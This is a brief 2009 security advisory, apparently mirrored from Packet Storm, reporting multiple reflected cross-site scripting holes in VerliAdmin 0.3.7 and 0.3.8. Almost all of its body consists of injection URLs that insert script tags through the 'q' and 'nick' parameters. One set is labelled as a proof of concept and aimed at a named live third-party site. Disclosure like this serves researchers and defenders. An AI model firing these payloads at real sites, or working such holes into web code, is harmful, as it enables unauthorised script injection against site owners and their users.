VerliAdmin versions 0.3.7 and 0.3.8 suffer from multiple cross site scripting vulnerabilities.
abf125c4b7b20a724003bb3c67cf9f6473813c310e64b9f1026d6f5bdb23438eVerliAdmin- v0.3.7 - v0.3.8 -Multiple Cross-site Scripting Vulnerabilities
https://bohyn.czechweb.cz
- 5-05-2009
- Methodman - https://nemesis.te-home.net
-Example:
http//:verliadmin.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>
http//:verliadmin.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>
http//:verliadmin.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>
http//:verliadmin.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>
-Proof of Concept:
https://alfa.hub.lv/alfa/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script>
https://alfa.hub.lv/alfa/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script>
https://alfa.hub.lv/alfa/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script>
https://alfa.hub.lv/alfa/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script>
/teamelite 2009
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed